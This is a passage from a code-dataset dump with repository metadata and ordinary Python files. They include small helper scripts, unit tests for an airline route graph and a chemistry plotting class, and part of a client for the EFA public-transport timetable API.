] | 1 | 2019-08-16T13:47:46.000Z | 2019-08-16T13:47:46.000Z | common/helpers.py | gtsiokos/diogenis | c83d4dac26df68bbbf897c48a5552ea9c9ede9c2 | [
"BSD-3-Clause"
] | null | null | null | common/helpers.py | gtsiokos/diogenis | c83d4dac26df68bbbf897c48a5552ea9c9ede9c2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- coding: utf8 -*-
import hashlib
| 21.8125 | 69 | 0.590258 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- coding: utf8 -*-
import hashlib
def get_hashed_id(object_id):
hashed_id = hashlib.sha256( str(object_id) )
return hashed_id.hexdigest()
def humanize_time(time):
t = (u"%d μ.μ." % (time-12) if time >= 13 else u"%d π.μ." % time)
if time == 12: t = u"%d μ.μ." % time
return t
| 223 | 0 | 46 |
1bd903dfb9b3c865b70e9022d40b1ef39d839bc9 | 1,118 | py | Python | scripts/create_sample_images.py | JColl88/sdc1-solution-binder | 4a932b319bd26d66a4230de5014d53339fa85da9 | [
"BSD-3-Clause"
] | null | null | null | scripts/create_sample_images.py | JColl88/sdc1-solution-binder | 4a932b319bd26d66a4230de5014d53339fa85da9 | [
"BSD-3-Clause"
] | null | null | null | scripts/create_sample_images.py | JColl88/sdc1-solution-binder | 4a932b319bd26d66a4230de5014d53339fa85da9 | [
"BSD-3-Clause"
] | null | null | null | import os
from pathlib import Path
from ska.sdc1.utils.image_utils import crop_to_training_area
# Challenge frequency bands
#
FREQS = [560, 1400, 9200]
full_image_dir = os.path.join("data", "images")
sample_image_dir = os.path.join("data", "sample_images")
if __name__ == "__main__":
"""
Helper script to generate small sample images from the full images, for testing.
These are 1.5 times the size (2.25 times the area) of the training area.
"""
for freq in FREQS:
try:
Path(sample_image_dir).mkdir(parents=True, exist_ok=True)
crop_to_training_area(
full_image_path(freq), sample_image_path(freq), freq, 1.5
)
except FileNotFoundError:
print(
"Could not find image {}; run download_data.sh first".format(
full_image_path(freq)
)
)
| 27.268293 | 84 | 0.646691 | import os
from pathlib import Path
from ska.sdc1.utils.image_utils import crop_to_training_area
# Challenge frequency bands
#
FREQS = [560, 1400, 9200]
full_image_dir = os.path.join("data", "images")
sample_image_dir = os.path.join("data", "sample_images")
def full_image_path(freq):
return os.path.join(full_image_dir, "{}mhz_1000h.fits".format(freq))
def sample_image_path(freq):
return os.path.join(sample_image_dir, "{}mhz_1000h_sample.fits".format(freq))
if __name__ == "__main__":
"""
Helper script to generate small sample images from the full images, for testing.
These are 1.5 times the size (2.25 times the area) of the training area.
"""
for freq in FREQS:
try:
Path(sample_image_dir).mkdir(parents=True, exist_ok=True)
crop_to_training_area(
full_image_path(freq), sample_image_path(freq), freq, 1.5
)
except FileNotFoundError:
print(
"Could not find image {}; run download_data.sh first".format(
full_image_path(freq)
)
)
| 167 | 0 | 46 |
783fca3a6ff9d0b95b21823f4aed095974cacc79 | 12,099 | py | Python | Tests/test_graph.py | dguan4/Airline | c461c5525f1739333bc5d969a87eabbd4ed9c855 | [
"MIT"
] | null | null | null | Tests/test_graph.py | dguan4/Airline | c461c5525f1739333bc5d969a87eabbd4ed9c855 | [
"MIT"
] | null | null | null | Tests/test_graph.py | dguan4/Airline | c461c5525f1739333bc5d969a87eabbd4ed9c855 | [
"MIT"
] | null | null | null | from unittest import TestCase
from graph import Graph
from edge import Edge
from vertex import Vertex
import collections as col
| 41.013559 | 226 | 0.592528 | from unittest import TestCase
from graph import Graph
from edge import Edge
from vertex import Vertex
import collections as col
class TestGraph(TestCase):
def test_add_from_json(self):
"""
Tests the add_from_json function in the Graph class
:return: true if all asserts pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
self.assertIsInstance(graph, Graph)
self.assertIsInstance(graph.edges, dict)
self.assertIs(len(graph.edges), 48)
self.assertIs(len(graph.vertices), 48)
pass
def test_longest_flight(self):
"""
Tests the longest_flight function in the Graph class
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
longest = graph.longest_flight()
self.assertEqual(longest[2], 12051)
self.assertTrue(longest[0] in ("SYD", "LAX"))
self.assertTrue(longest[1] in ("SYD", "LAX"))
self.assertIsNot(longest, 0)
pass
def test_shortest_flight(self):
"""
Tests the shortest_flight function in the Graph class
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
shortest = graph.shortest_flight()
self.assertEqual(shortest[2], 334)
self.assertTrue(shortest[0] in ("WAS", "NYC"))
self.assertTrue(shortest[1] in ("WAS", "NYC"))
self.assertIsNot(shortest[2], 0)
pass
def test_average_distance(self):
"""
Tests the average distance
:return: true if all test pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
average = graph.average_distance()
self.assertEqual(average, 2300.276595744681)
self.assertNotEqual(average, 0)
pass
def test_biggest_city(self):
"""
Tests the biggest city
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
biggest = graph.biggest_city()
self.assertEqual(biggest[2], 34000000)
self.assertTrue(biggest[1] in ("TYO", "Tokyo"))
self.assertTrue(biggest[0] in ("TYO", "Tokyo"))
pass
def test_smallest_city(self):
"""
Tests the smallest city
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
smallest = graph.smallest_city()
self.assertEquals(smallest[2], 589900)
self.assertTrue(smallest[0] in ("ESS", "Essen"))
self.assertTrue(smallest[1] in ("ESS", "Essen"))
pass
def test_average_city_size(self):
"""
Test the average city size
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
average = graph.average_city_size()
self.assertEqual(average, 11796143)
self.assertNotEqual(average, 0)
pass
def test_continents_and_cities(self):
"""
Test the continents and cities
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
list_continents_and_cities = graph.continents_and_cities()
self.assertNotEqual(len(list_continents_and_cities), 0)
cities = ("Buenos Aires", "Bogota", "Santiago", "Lima", "Sao Paulo")
self.assertTrue(list_continents_and_cities["South America"][0] in cities)
self.assertTrue(list_continents_and_cities["South America"][1] in cities)
self.assertTrue(list_continents_and_cities["South America"][2] in cities)
self.assertTrue(list_continents_and_cities["South America"][3] in cities)
self.assertTrue(list_continents_and_cities["South America"][4] in cities)
cities = ("Beijing", "Bangkok", "Osaka", "Taipei", "Chennai", "Shanghai", "Mumbai", "Ho Chi Minh City", "Riyadh", "Karachi", "Manila", "Tokyo", "Seoul", "Bagdad", "Delhi", "Jakarta", "Hong Kong", "Calcutta", "Tehrah")
self.assertTrue(list_continents_and_cities["Asia"][0] in cities)
self.assertTrue(list_continents_and_cities["Asia"][1] in cities)
self.assertTrue(list_continents_and_cities["Asia"][2] in cities)
self.assertTrue(list_continents_and_cities["Asia"][3] in cities)
self.assertTrue(list_continents_and_cities["Asia"][4] in cities)
self.assertTrue(list_continents_and_cities["Asia"][5] in cities)
self.assertTrue(list_continents_and_cities["Asia"][6] in cities)
self.assertTrue(list_continents_and_cities["Asia"][7] in cities)
self.assertTrue(list_continents_and_cities["Asia"][8] in cities)
self.assertTrue(list_continents_and_cities["Asia"][9] in cities)
self.assertTrue(list_continents_and_cities["Asia"][10] in cities)
self.assertTrue(list_continents_and_cities["Asia"][11] in cities)
self.assertTrue(list_continents_and_cities["Asia"][12] in cities)
self.assertTrue(list_continents_and_cities["Asia"][13] in cities)
self.assertTrue(list_continents_and_cities["Asia"][14] in cities)
self.assertTrue(list_continents_and_cities["Asia"][15] in cities)
self.assertTrue(list_continents_and_cities["Asia"][16] in cities)
self.assertTrue(list_continents_and_cities["Asia"][17] in cities)
self.assertTrue(list_continents_and_cities["Asia"][18] in cities)
pass
def test_hubs(self):
"""
Test the hubs in the network
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
hubs = graph.hubs()
dict = {('HKG', 6),('IST', 6),('BGW', 5),('BKK', 5),('BOG', 5)}
self.assertTrue(hubs[0] in dict)
self.assertTrue(hubs[1] in dict)
self.assertTrue(hubs[2] in dict)
self.assertTrue(hubs[3] in dict)
self.assertTrue(hubs[4] in dict)
pass
def test_remove_cities(self):
"""
Test the remove cities function
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
self.assertTrue("AYY" in graph.vertices)
self.assertTrue("LOL" in graph.vertices)
self.assertTrue("LMA" in graph.vertices)
self.assertTrue("AYY" in graph.edges)
self.assertTrue("AYY" in graph.edges["AYY"][0].start)
graph.remove_city("AYY")
self.assertFalse("AYY" in graph.vertices)
self.assertFalse("AYY" in graph.edges)
for _list in graph.edges.values():
for edge in _list:
self.assertFalse("AYY" == edge.start)
self.assertFalse("AYY" == edge.destination)
pass
def test_remove_route(self):
"""
Test the remove route function
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
self.assertTrue("AYY" in graph.edges)
ayy_edge = graph.edges["AYY"]
for edge in ayy_edge:
self.assertTrue("AYY" == edge.start)
for edge in graph.edges["LOL"]:
self.assertTrue("AYY" == edge.destination or "LMA" == edge.destination)
graph.remove_route("AYY", "LOL")
for edge in ayy_edge:
self.assertFalse("LOL" == edge.destination)
for edge in graph.edges["LOL"]:
self.assertTrue("AYY" == edge.destination or "LMA" == edge.destination)
graph.remove_route("LOL", "AYY")
for edge in graph.edges["LOL"]:
self.assertFalse("AYY" == edge.destination)
pass
def test_add_city(self):
"""
Test the add city function
:return: true if all tests pass
"""
graph = Graph()
metros = {'code': "SCL", 'name': "Santiago", 'country': "CL", 'continent': "South America", 'timezone': -4,
'coordinates': {"S": 33, "W": 71}, 'population': 6000000, 'region': 1}
vertex = Vertex(metros)
self.assertFalse(vertex in graph.vertices)
graph.add_city(metros)
self.assertTrue("SCL" in graph.vertices)
other_vertex = graph.vertices["SCL"]
self.assertTrue(vertex.code == other_vertex.code)
self.assertTrue(vertex.name == other_vertex.name)
self.assertTrue(vertex.country == other_vertex.country)
self.assertTrue(vertex.continent == other_vertex.continent)
self.assertTrue(vertex.timezone == other_vertex.timezone)
self.assertTrue(vertex.coordinates == other_vertex.coordinates)
self.assertTrue(vertex.population == other_vertex.population)
self.assertTrue(vertex.region == other_vertex.region)
pass
def test_add_route(self):
"""
Test the add route function
:return: true if all tests pass
"""
graph = Graph()
distance = 420
start = "LOL"
destination = "KEK"
edge = Edge(distance, start, destination)
self.assertFalse("LOL" in graph.edges)
graph.add_route(distance, start, destination)
self.assertTrue("LOL" in graph.edges)
self.assertTrue(start == graph.edges["LOL"][0].start)
self.assertTrue(destination == graph.edges["LOL"][0].destination)
self.assertTrue(distance == graph.edges["LOL"][0].distance)
self.assertTrue(edge.start == graph.edges["LOL"][0].start)
self.assertTrue(edge.destination == graph.edges["LOL"][0].destination)
self.assertTrue(edge.distance == graph.edges["LOL"][0].distance)
pass
def test_edit_city(self):
"""
Test the edit city function
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
self.assertTrue("LOL" in graph.vertices)
vertex = graph.vertices["LOL"]
self.assertTrue(vertex.code == "LOL")
self.assertTrue(vertex.name == "Hello")
graph.edit_city("LOL", "code", "KEK")
self.assertTrue("KEK" in graph.vertices)
self.assertFalse("LOL" in graph.vertices)
vertex = graph.vertices["KEK"]
self.assertTrue(vertex.name == "Hello")
graph.edit_city("KEK", "name", "BLAH")
self.assertTrue(vertex.name == "BLAH")
pass
def test_route_info(self):
"""
Test whether the route information is correct
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
route = graph.route_info(["LOL", "AYY"])
self.assertTrue(route[0] == 2736)
self.assertTrue(route[1] == 957.6)
self.assertTrue(route[2] == 4.18)
route = graph.route_info(["LOL", "AYY", "LMA"])
self.assertTrue(route[0] == 9705)
self.assertTrue(route[1] == 3048.3)
self.assertTrue(route[2] == 15.84)
route = graph.route_info(["BLAH", "LOL"])
self.assertTrue(route == (0, 0, 0))
pass
def test_djikstra(self):
"""
Test whether djikstra calculates the shortest route
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
route = graph.djikstra("AYY", "LMA")
self.assertTrue(["AYY", "LOL", "LMA"] == route)
route = graph.djikstra("LMA", "AYY")
self.assertTrue(route == ["LMA", "LOL", "AYY"])
route = graph.djikstra("LOL", "LMA")
self.assertTrue(route == ["LOL", "LMA"])
route = graph.djikstra("LMA", "LOL")
self.assertTrue(route == ["LMA", "LOL"])
| 0 | 11,939 | 25 |
2cca849ff3e302117332a11854b3931a325f5621 | 972 | py | Python | tests/test_plots/test_base_plot.py | CMargreitter/ChemCharts | ec47b8f572f6b77518051aafc578557a5a10c2d0 | [
"Apache-2.0"
] | 16 | 2022-01-29T05:32:13.000Z | 2022-03-02T15:19:17.000Z | tests/test_plots/test_base_plot.py | CMargreitter/ChemCharts | ec47b8f572f6b77518051aafc578557a5a10c2d0 | [
"Apache-2.0"
] | 7 | 2022-02-01T22:34:57.000Z | 2022-03-11T23:02:27.000Z | tests/test_plots/test_base_plot.py | CMargreitter/ChemCharts | ec47b8f572f6b77518051aafc578557a5a10c2d0 | [
"Apache-2.0"
] | 1 | 2022-01-19T12:41:38.000Z | 2022-01-19T12:41:38.000Z | import unittest
from chemcharts.core.plots.base_plot import BasePlot
| 34.714286 | 84 | 0.693416 | import unittest
from chemcharts.core.plots.base_plot import BasePlot
class TestBasePlot(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
pass
def test_path_update_snapshot(self):
test_base_plot = BasePlot()
test_updated_path = test_base_plot._path_update_snapshot(
ori_path="../junk/base_plot_test/path_update.png", epoch_id=2)
self.assertIn(
"/base_plot_test/0002_path_update.png",
test_updated_path)
test_updated_path = test_base_plot._path_update_snapshot(
ori_path="../junk/base_plot_test/path_update", epoch_id=6)
self.assertIn(
"/base_plot_test/0006_path_update.png",
test_updated_path)
test_updated_path = test_base_plot._path_update_snapshot(
ori_path="../junk/base_plot_test/path_update.jpeg", epoch_id=12)
self.assertIn("junk/base_plot_test/0012_path_update.png", test_updated_path)
| 791 | 87 | 23 |
b163d91b901f7d637f3ef8540aeac505134ad228 | 39,730 | py | Python | src/choo/apis/efa.old.py | codingcatgirl/choo | 128990f1fe89a4740110ead81987832e01bf7393 | [
"Apache-2.0"
] | null | null | null | src/choo/apis/efa.old.py | codingcatgirl/choo | 128990f1fe89a4740110ead81987832e01bf7393 | [
"Apache-2.0"
] | null | null | null | src/choo/apis/efa.old.py | codingcatgirl/choo | 128990f1fe89a4740110ead81987832e01bf7393 | [
"Apache-2.0"
] | null | null | null | import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta
import requests
from ...models import (POI, Address, Coordinates, Line, LineType, LineTypes, LiveTime, Location, MetaRide, Platform,
Ride, RidePoint, RideSegment, Searchable, Stop, TicketData, TicketList, Trip, Way, WayEvent,
WayType)
from .base import API
| 40.916581 | 117 | 0.546313 | import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta
import requests
from ...models import (POI, Address, Coordinates, Line, LineType, LineTypes, LiveTime, Location, MetaRide, Platform,
Ride, RidePoint, RideSegment, Searchable, Stop, TicketData, TicketList, Trip, Way, WayEvent,
WayType)
from .base import API
class EFA(API):
def __init__(self, name, base_url, preset='de', country_by_id=(), replace_in_full_name={}, **kwargs):
super().__init__(name, **kwargs)
self.base_url = base_url
self.country_by_id = () if country_by_id is None else country_by_id
self.replace_in_full_name = {}
if preset == 'de':
self.replace_in_full_name = {
', Hauptbahnhof$': ' Hbf',
' Hauptbahnhof$': ' Hbf',
' Bahnhof$': '',
' Bf$': '',
' S$': '',
', Hbf%': ' Hbf'
}
self.replace_in_full_name.update(replace_in_full_name)
def _query_get(self, obj):
if isinstance(obj, Stop):
result, now = self._request_departures(obj)
if not isinstance(result, obj.__class__):
result = None
else:
raise NotImplementedError
return result, now
def _query_search(self, model, request):
if model == Location:
return self._request_stops(request)
elif model == Trip:
return self._request_trips(request)
raise NotImplementedError
def _finalize_stop(self, stop):
if stop.full_name is None:
return
if stop.name is not None and stop.city is None and stop.full_name.endswith(' '+stop.name):
stop.city = stop.full_name[:-len(stop.name)].strip()
if stop.city.endswith(','):
stop.city = stop.city[:-1]
stop.full_name = stop.full_name+'$'
for before, after in self.replace_in_full_name.items():
stop.full_name = stop.full_name.replace(before, after)
stop.full_name = stop.full_name.replace('$', '').strip()
if stop.full_name.endswith(','):
stop.full_name = stop.full_name[:-1]
if stop.name is not None and stop.city is not None:
if stop.full_name == stop.city+' '+stop.name:
stop.full_name = stop.city+', '+stop.name
# yes, again. exactly at this position, to not strigger
if stop.name is not None and stop.city is None and stop.full_name.endswith(' '+stop.name):
stop.city = stop.full_name[:-len(stop.name)].strip()
# Internal methods start here
def _convert_location(self, location, wrap=''):
""" Convert a Location into POST parameters for the EFA Requests """
myid = location.id if location.source == self.name else None
city = location.city
name = location.name
if city is None and location.full_name is not None:
name = location.full_name
model = location.Model if isinstance(location, Location.Request) else location.__class__
if name is None:
if location.lat is not None and location.lon is not None:
r = {'type': 'coord', 'name': '%.6f:%.6f:WGS84' % (location.lon, location.lat)}
else:
r = {'type': 'stop', 'place': city, 'name': ''}
elif issubclass(model, Stop):
if myid is not None:
r = {'type': 'stop', 'place': None, 'name': str(myid)}
elif location.ifopt is not None and location.country is not None:
r = {'type': 'stop', 'place': None,
'name': '%s:%s:%s' % ((location.country, ) + location.ifopt)}
else:
r = {'type': 'stop', 'place': city, 'name': name}
elif issubclass(model, Address):
r = {'type': 'address', 'place': city, 'name': name}
elif issubclass(model, POI):
if myid is not None:
r = {'type': 'poiID', 'name': str(myid)}
else:
r = {'type': 'poi', 'place': city, 'name': name}
elif issubclass(model, Location):
r = {'type': 'any', 'place': city, 'name': name if name else None}
else:
raise NotImplementedError
if r['place'] is None:
del r['place']
if wrap:
r = {wrap % n: v for n, v in r.items()}
return r
def _request(self, endpoint, data):
text = requests.post(self.base_url + endpoint, data=data).text
if self.dump_raw:
open('dump.xml', 'w').write(text)
xml = ET.fromstring(text)
servernow = datetime.strptime(xml.attrib['now'], '%Y-%m-%dT%H:%M:%S')
return xml, servernow
def _request_trips(self, triprequest):
""" Searches connections/Trips; Returns a SearchResult(Trip) """
now = datetime.now()
assert triprequest.walk_speed in ('slow', 'normal', 'fast')
linetypes = triprequest.linetypes
if linetypes is None:
linetypes = LineTypes()
departure = triprequest.departure
arrival = triprequest.arrival
if isinstance(departure, datetime):
departure = LiveTime(departure)
if isinstance(arrival, datetime):
arrival = LiveTime(arrival)
if departure is not None:
deparr = 'dep'
time_ = departure.expected_time
elif arrival is not None:
deparr = 'arr'
time_ = arrival.expected_time
else:
deparr = 'dep'
time_ = now
max_changes = triprequest.max_changes
if max_changes is None:
max_changes = 9
post = {
'changeSpeed': triprequest.walk_speed,
'command': '',
'coordOutputFormat': 'WGS84',
'imparedOptionsActive': 1,
'includedMeans': 'checkbox',
'itOptionsActive': 1,
'itdDateDay': time_.day,
'itdDateMonth': time_.month,
'itdDateYear': time_.year,
'itdTimeHour': time_.hour,
'itdTimeMinute': time_.minute,
'itdTripDateTimeDepArr': deparr,
'language': 'de',
'locationServerActive': 1,
'maxChanges': max_changes,
'name_via': '', # .decode('utf-8').encode('iso-8859-1'),
'nextDepsPerLeg': 1,
'place_via': '', # decode('utf-8').encode('iso-8859-1'),
'ptOptionsActive': 1,
'requestID': 0,
'routeType': 'LEASTTIME',
# {'speed':'LEASTTIME', 'waittime':'LEASTINTERCHANGE', 'distance':'LEASTWALKING'}[select_interchange_by],
'sessionID': 0,
'type_via': 'stop',
'useRealtime': 1,
'outputFormat': 'XML'
}
# if use_realtime: post['useRealtime'] = 1
if 'train' in linetypes:
post['inclMOT_0'] = 'on'
if 'train.longdistance.highspeed' in linetypes:
post['lineRestriction'] = 400
elif 'train.longdistance' in linetypes:
post['lineRestriction'] = 401
else:
post['lineRestriction'] = 403
for linetype, number in (('urban', '1'), ('metro', '2'), ('metro', '3'),
('tram', '4'), ('bus.city', '5'), ('bus.regional', '6'),
('bus.express', '7'), ('suspended', '8'), ('ship', '9'),
('dialable', '10'), ('other', '11')):
if linetype in linetypes:
post['inclMOT_' + number] = 'on'
if triprequest.wayduration_origin or triprequest.wayduration_destination:
post['useProxFootSearch'] = 1
waytypes = {'walk': 100, 'bike': 101, 'car': 104, 'taxi': 105}
post['trITDepMOT'] = waytypes[str(triprequest.waytype_origin)]
post['trITArrMOT'] = waytypes[str(triprequest.waytype_destination)]
post['trITDepMOTvalue%d' % post['trITDepMOT']] = triprequest.wayduration_origin.total_seconds() // 60
post['trITArrMOTvalue%d' % post['trITArrMOT']] = triprequest.wayduration_destination.total_seconds() // 60
if triprequest.with_bike:
post['bikeTakeAlong'] = 1
if triprequest.wheelchair:
post['wheelchair'] = 1
if triprequest.low_floor_only:
post['lowPlatformVhcl'] = 1
if not triprequest.allow_solid_stairs:
post['noSolidStairs'] = 1
if not triprequest.allow_escalators:
post['noEscalators'] = 1
if not triprequest.allow_elevators:
post['noElevators'] = 1
post.update(self._convert_location(triprequest.origin, '%s_origin'))
post.update(self._convert_location(triprequest.destination, '%s_destination'))
xml, servernow = self._request('XSLT_TRIP_REQUEST2', post)
data = xml.find('./itdTripRequest')
results = Trip.Results(self._parse_trips(data.find('./itdItinerary/itdRouteList')))
results.origin = self._parse_location(data.find('./itdOdv[@usage="origin"]'))
results.destination = self._parse_location(data.find('./itdOdv[@usage="destination"]'))
# todo – better exceptions here
if isinstance(results.origin, list):
raise ValueError('origin not found')
if isinstance(results.destination, list):
raise ValueError('destination not found')
return results, servernow
def _request_stops(self, stop):
""" Searches a Stop; Returns a SearchResult(Stop) """
post = {
'language': 'de',
'outputFormat': 'XML',
'coordOutputFormat': 'WGS84',
'locationServerActive': 1,
# 'regionID_sf': 1, // own region
'SpEncId': 0,
'odvSugMacro': 'true',
'useHouseNumberList': 'true',
}
post.update(self._convert_location(stop, '%s_sf'))
xml, servernow = self._request('XSLT_STOPFINDER_REQUEST', post)
data = xml.find('./itdStopFinderRequest')
results = self._parse_location(data.find('./itdOdv'))
if type(results) != list:
return stop.Model.Results([results] if isinstance(results, stop.Model) else []), servernow
results = [result for result in results if isinstance(result[0], stop.Model)]
if isinstance(stop, Searchable.Request) and stop.limit is not None:
results = results[:stop.limit]
return stop.Model.Results(results, scored=True), servernow
def _request_departures(self, stop: Stop, time=None):
""" Fills in Stop.rides; Can Return A SearchResult(Stop) without rides. """
if time is None:
time = datetime.now()
post = {
'command': '',
'coordOutputFormat': 'WGS84',
'imparedOptionsActive': 1,
'itdDateDay': time.day,
'itdDateMonth': time.month,
'itdDateYear': time.year,
'itdTimeHour': time.hour,
'itdTimeMinute': time.minute,
'language': 'de',
'lsShowTrainsExplicit': 1,
'mode': 'direct',
'outputFormat': 'XML',
'locationServerActive': 1,
'itOptionsActive': 1,
'ptOptionsActive': 1,
'includeCompleteStopSeq': 1,
'depType': 'stopEvents',
'useRealtime': 1,
'stateless': 1,
'requestID': 0,
'sessionID': 0
}
post.update(self._convert_location(stop, '%s_dm'))
xml, servernow = self._request('XSLT_DM_REQUEST', post)
data = xml.find('./itdDepartureMonitorRequest')
stop = self._parse_location(data.find('./itdOdv'))
if type(stop) == list:
raise ValueError('Stop not found.')
# todo return Stop.Results(stop), servernow
lineslist = data.find('./itdServingLines')
if lineslist is not None:
rlines = []
lines = lineslist.findall('./itdServingLine')
for line in lines:
ride, origin, destination = self._parse_ride(line)
line = ride.meta.line
line.first_stop = origin
line.last_stop = destination
# line.low_quality = True
rlines.append(line)
stop.lines = Line.Results(rlines)
departureslist = data.find('./itdDepartureList')
stop.rides = self._parse_departures(departureslist, stop, servernow)
return stop, servernow
def _parse_stopid_country(self, i):
for s, country in self.country_by_id:
if i.startswith(s):
return country
return None
def _get_attrib(self, xml, *keys, noempty=True, default=None, strip=False):
attrib = xml.attrib
for key in keys:
value = attrib.get(key)
if strip:
value = value.strip()
if value or (not noempty and value == ''):
return value
return default
def _parse_stop_line(self, data):
""" Parse an AssignedStop ODV line """
stop = Stop(country=self._parse_stopid_country(data.attrib['stopID']),
name=data.text,
city=self._get_attrib(data, 'locality', 'place'),
full_name=self._get_attrib(data, 'nameWithPlace'),
id=int(data.attrib['stopID']))
gid = data.attrib.get('gid', '').split(':')
if len(gid) == 3 and min(len(s) for s in gid):
stop.country = 'de'
stop.ifopt = ':'.join((gid[1], gid[2]))
if 'x' in data.attrib:
stop.lat = float(data.attrib['y']) / 1000000
stop.lon = float(data.attrib['x']) / 1000000
result = Stop.Result(stop)
if 'distanceTime' in data.attrib:
result.duration = timedelta(minutes=int(data.attrib['distanceTime']))
result.distance = 0
if 'distance' in data.attrib:
result.distance = int(data.attrib['distance'])
return result
def _parse_location(self, data):
""" Parse an ODV (OriginDestinationVia) XML node """
odvtype = data.attrib['type']
results = []
# Place.city
p = data.find('./itdOdvPlace')
cityid = None
if p.attrib['state'] == 'empty':
city = None
elif p.attrib['state'] != 'identified':
if p.attrib['state'] == 'list':
pe = p.find('./odvPlaceElem')
for item in pe:
location = Location(None, city=item.text)
results.append(location)
return results
else:
pe = p.find('./odvPlaceElem')
cityid = pe.attrib.get('placeID')
city = pe.text
# Location.name
n = data.find('./itdOdvName')
if n.attrib['state'] == 'empty':
if city is not None:
location = Location(None, city)
results.append(location)
return results
elif n.attrib['state'] != 'identified':
if n.attrib['state'] == 'list':
ne = n.findall('./odvNameElem')
results = [self._parse_location_name(item, city, cityid, odvtype) for item in ne]
results.sort(key=lambda odv: odv[1], reverse=True)
return results
else:
ne = n.find('./odvNameElem')
result = self._parse_location_name(ne, city, cityid, odvtype)[0]
near_stops = []
for near_stop in data.findall('./itdOdvAssignedStops/itdOdvAssignedStop'):
stop = self._parse_stop_line(near_stop)
if stop.result != result:
near_stops.append(stop)
if near_stops:
result.near_stops = Stop.Results(near_stops)
return result
def _parse_location_name(self, data, city, cityid, odvtype):
""" Parses the odvNameElem of an ODV """
# AnyTypes are used in some EFA instances instead of ODV types
odvtype = self._get_attrib(data, 'anyType', default=odvtype)
# Even though we got the city, some APIs deliver it only in the odvNameElem…
city = self._get_attrib(data, 'locality', default=city)
# What kind of location is it? Fill in attributes.
name = data.attrib.get('objectName', data.text)
if odvtype == 'stop':
location = Stop(city=city, name=name)
elif odvtype == 'poi':
location = POI(city=city, name=name)
elif odvtype == 'street':
location = Address(city=city, name=name)
elif odvtype in ('singlehouse', 'coord', 'address'):
location = Address(city=city, name=name)
location.street = data.attrib['streetName'] if 'streetName' in data.attrib else None
location.number = data.attrib['buildingNumber'] if 'buildingNumber' in data.attrib else None
if location.number is None:
location.number = data.attrib['houseNumber'] if 'houseNumber' in data.attrib else None
location.name = '%s %s' % (location.street, location.number)
else:
raise NotImplementedError('Unknown odvtype: %s' % odvtype)
# IDs can come in different ways… Sometimes this is the only way to determine the Location type…
id_ = self._get_attrib(data, 'stopID', 'id')
if id_:
location.country = self._parse_stopid_country(id_)
location.id = int(id_)
# This is used when we got more than one Location
score = int(data.attrib.get('matchQuality', 0))
# Coordinates
if 'x' in data.attrib:
location.lat = float(data.attrib['y']) / 1000000
location.lon = float(data.attrib['x']) / 1000000
return location, score
def _parse_departures(self, data, stop, servernow):
""" Parses itdDeparture into a List of RideSegment """
servernow.replace(second=0, microsecond=0)
results = []
departures = data.findall('./itdDeparture')
for departure in departures:
# Get Line Information
ride, origin, destination = self._parse_ride(departure.find('./itdServingLine'))
if departure.find('./genAttrList/genAttrElem[value="HIGHSPEEDTRAIN"]') is not None:
ride.line.linetype = LineType('train.longdistance.highspeed')
elif departure.find('./genAttrList/genAttrElem[value="LONG_DISTANCE_TRAINS"]') is not None:
ride.line.linetype = LineType('train.longdistance')
# Build Ride Objekt with known stops
mypoint = self._parse_ridepoint(departure) # todo: take delay and add it to next stops
before_delay = after_delay = None
if mypoint.arrival:
before_delay = mypoint.arrival.delay
if mypoint.departure:
after_delay = mypoint.departure.delay
delay = None
if departure.find('./itdServingLine/itdNoTrain'):
delay = departure.find('./itdServingLine/itdNoTrain').attrib.get('delay', None)
if delay is not None:
delay = timedelta(minutes=delay)
if delay is not None:
if ((mypoint.arrival and servernow < mypoint.arrival.expected_time) or
(mypoint.departure and servernow < mypoint.departure.expected_time)):
before_delay = delay
else:
after_delay = delay
prevs = False
start = 0
for pointdata in departure.findall('./itdPrevStopSeq/itdPoint'):
point = self._parse_ridepoint(pointdata)
if point is not None:
if before_delay is not None:
if (point.arrival is not None and point.arrival.delay is None and
point.arrival.time + before_delay >= servernow):
point.arrival.delay = before_delay
if (point.departure is not None and point.departure.delay is None and
point.departure.time + before_delay >= servernow):
point.departure.delay = before_delay
prevs = True
ride.append(point)
start += 1
ride.append(mypoint)
onwards = False
for pointdata in departure.findall('./itdOnwardStopSeq/itdPoint'):
point = self._parse_ridepoint(pointdata)
if point is not None:
if after_delay is not None:
if (point.arrival is not None and point.arrival.delay is None and
point.arrival.time + after_delay >= servernow):
point.arrival.delay = after_delay
if (point.departure is not None and point.departure.delay is None and
point.departure.time + after_delay >= servernow):
point.departure.delay = after_delay
onwards = True
ride.append(point)
if not prevs and not onwards:
ride.prepend(None)
if origin is not None:
ride.prepend(RidePoint(Platform(origin)))
start += 1
ride.append(None)
if destination is not None:
ride.append(RidePoint(Platform(destination)))
if ride[0] is not None and ride.meta.id is not None:
ride.id = '%s:%s' % (ride.meta.id, ride[0].departure.time.strftime('%Y%m%d'))
# Return RideSegment from the Station we depart from on
results.append(ride[start:])
return Ride.Results(results)
def _parse_trips(self, data):
""" Parses itdRoute into a Trip """
trips = []
if data is None:
return trips
routes = data.findall('./itdRoute')
for route in routes:
trip = Trip()
interchange = None
for routepart in route.findall('./itdPartialRouteList/itdPartialRoute'):
part = self._parse_trippart(routepart)
if part is None:
continue
if interchange is not None:
